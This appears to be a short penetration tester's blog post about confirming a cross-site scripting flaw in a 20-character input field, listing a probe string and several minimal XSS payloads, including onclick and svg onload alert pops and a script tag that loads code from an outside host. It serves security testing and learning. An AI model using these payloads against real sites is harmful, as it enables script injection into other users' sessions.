While testing an app, a text field on one of the pages, was not accepting more than 20 characters (server side validation). I inserted following piece of code to check XSS (From RSnake’s XSS cheat sheet):

'';!--"<XSS>=&{()}

and verified the HTML source for <XSS verses &lt;XSS . As <XSS was in the HTML source,  the input field was missing output encoding and was vulnerable to cross site scripting.

I was now aiming to get a popup. Only thing was I was used to alert(1) and here I needed a smaller script. I tried to create/find some script which is less than or equal to 20 characters but I was unable to find anything. At that point of time, a random thought came to my mind that, what could be the smallest payload to pop up an alert. I asked this question in IT Security stack-exchange forum. I was also able to make a few payloads myself. Here are those payloads as well as the payload from one of the answer.

<a href=http://a.by>
<a onclick=alert(2)>
<b onclick=alert(2)>
<script src=//h4k.me

Update (7th March, 2019)- This is a very old post and may be obsolete now. I guess as someone replied to that question in 2017, following may be the smallest payload to pop up an alert now. I need to check.

<svg/onload=alert()>

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s